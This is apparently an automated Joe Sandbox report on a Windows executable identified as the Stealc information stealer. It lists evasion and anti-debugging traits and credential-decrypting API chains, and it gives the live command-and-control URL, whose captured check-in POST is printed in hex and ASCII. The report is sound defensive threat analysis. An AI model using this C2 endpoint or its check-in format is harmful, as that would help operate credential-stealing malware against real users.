Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544273
MD5:3bdbd89b86e70ca180f24b3acc79bc1f
SHA1:a425bb88b0b48ac5b0af08f31dfa241fcd73385b
SHA256:13188e8c8ca814a413636036d5fda36f97b41fa969f0e2ac831312bb394cc5bc
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5248 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3BDBD89B86E70CA180F24B3ACC79BC1F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2053306343.0000000004F40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5248JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5248JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.e40000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-29T07:54:01.532470+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.e40000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.206/6c4adf523b719729.phpVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.206/6c4adf523b719729.php.Virustotal: Detection: 15%Perma Link
                Source: http://185.215.113.206/6c4adf523b719729.php/Virustotal: Detection: 17%Perma Link
                Source: http://185.215.113.206/Virustotal: Detection: 18%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00E59030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E472A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E472A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E4A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E4A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00E4C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E540F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E540F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E4E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E547C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E547C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E41710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E54B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E53B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E4EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 44 36 30 37 39 42 41 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 2d 2d 0d 0a Data Ascii: ------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="hwid"C68D6079BAE23924696330------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="build"tale------KJKJKFCBKKJDGDHIDBGI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E462D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00E462D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 36 38 44 36 30 37 39 42 41 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 2d 2d 0d 0a Data Ascii: ------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="hwid"C68D6079BAE23924696330------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="build"tale------KJKJKFCBKKJDGDHIDBGI--
                Source: file.exe, 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2094837133.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.
                Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
                Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpj
                Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/m
                Source: file.exe, 00000000.00000002.2094837133.0000000000A08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E800980_2_00E80098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9B1980_2_00E9B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E721380_2_00E72138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E842880_2_00E84288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAE2580_2_00EAE258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBD39E0_2_00EBD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A32F30_2_012A32F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECB3080_2_00ECB308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129F50A0_2_0129F50A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011975770_2_01197577
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B55510_2_012B5551
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A85880_2_012A8588
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011645F00_2_011645F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E845A80_2_00E845A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAD5A80_2_00EAD5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E645730_2_00E64573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6E5440_2_00E6E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC96FD0_2_00EC96FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AD7310_2_012AD731
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E866C80_2_00E866C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBA6480_2_00EBA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AB6040_2_012AB604
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A66640_2_012A6664
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012026440_2_01202644
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB67990_2_00EB6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011996970_2_01199697
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9D7200_2_00E9D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B06F50_2_012B06F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF8D60_2_00EAF8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9B8A80_2_00E9B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A196D0_2_012A196D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E998B80_2_00E998B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E948680_2_00E94868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012AEB330_2_012AEB33
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA8BD90_2_00EA8BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB4BA80_2_00EB4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB0B880_2_00EB0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EBAC280_2_00EBAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E94DC80_2_00E94DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E95DB90_2_00E95DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9BD680_2_00E9BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E71D780_2_00E71D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAAD380_2_00EAAD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A4CC60_2_012A4CC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB1EE80_2_00EB1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129FF250_2_0129FF25
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B1FA40_2_012B1FA4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E88E780_2_00E88E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0134CFFA0_2_0134CFFA
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E44610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: fgyethhk ZLIB complexity 0.994837749435241
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E59790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00E53970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\RAZ09ANL.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2138112 > 1048576
                Source: file.exeStatic PE information: Raw size of fgyethhk is bigger than: 0x100000 < 0x19f000
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2053306343.0000000004F6B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fgyethhk:EW;cbzeryut:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fgyethhk:EW;cbzeryut:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E59BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x20fcdd should be: 0x20d750
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: fgyethhk
                Source: file.exeStatic PE information: section name: cbzeryut
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012DC12E push ebx; mov dword ptr [esp], eax0_2_012DC17F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6A0F2 push eax; retf 0_2_00E6A119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6A0DC push eax; retf 0_2_00E6A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012D514B push ebp; mov dword ptr [esp], edx0_2_012D5155
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012D514B push 24B51807h; mov dword ptr [esp], eax0_2_012D517E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_015701FD push eax; mov dword ptr [esp], 0740B0C2h0_2_01570252
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137A03C push 34E4440Ch; mov dword ptr [esp], ebx0_2_0137A068
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137A03C push edx; mov dword ptr [esp], 7945E048h0_2_0137A089
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012DF0A7 push ebp; mov dword ptr [esp], 7F5B7441h0_2_012DF92D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012DD372 push ebp; mov dword ptr [esp], ecx0_2_012DD3AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012DD372 push ebp; mov dword ptr [esp], eax0_2_012DD3BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013083A6 push edx; mov dword ptr [esp], 5FBFC62Ah0_2_013083C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130E391 push esi; mov dword ptr [esp], edx0_2_0130E3CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013693D7 push esi; mov dword ptr [esp], 73DF7040h0_2_0136940B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013693D7 push 194A9586h; mov dword ptr [esp], esp0_2_013694C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013423D2 push 564A00E8h; mov dword ptr [esp], ecx0_2_0134241E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013722BE push ecx; mov dword ptr [esp], 7F1D27D9h0_2_013722EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013722BE push 2837B476h; mov dword ptr [esp], eax0_2_01372332
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013722BE push edi; mov dword ptr [esp], 7FEFA814h0_2_01372359
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013722BE push eax; mov dword ptr [esp], ebx0_2_013723D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6A370 push eax; retf 0_2_00E6A39D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01382299 push ecx; mov dword ptr [esp], ebp0_2_013822B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011472A6 push edi; mov dword ptr [esp], 0AAC46F4h0_2_011472BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011472A6 push 50C8F0C8h; mov dword ptr [esp], ebx0_2_011472F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011472A6 push edx; mov dword ptr [esp], ecx0_2_01147318
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01302285 push ecx; mov dword ptr [esp], ebp0_2_013022AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E5B335 push ecx; ret 0_2_00E5B348
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A32F3 push 0C3221CBh; mov dword ptr [esp], esi0_2_012A32FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A32F3 push 7BBC8FB2h; mov dword ptr [esp], esi0_2_012A3343
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A32F3 push 3CDC09AAh; mov dword ptr [esp], ebx0_2_012A3351
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012A32F3 push eax; mov dword ptr [esp], edx0_2_012A339B
                Source: file.exeStatic PE information: section name: fgyethhk entropy: 7.9536291120516625

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
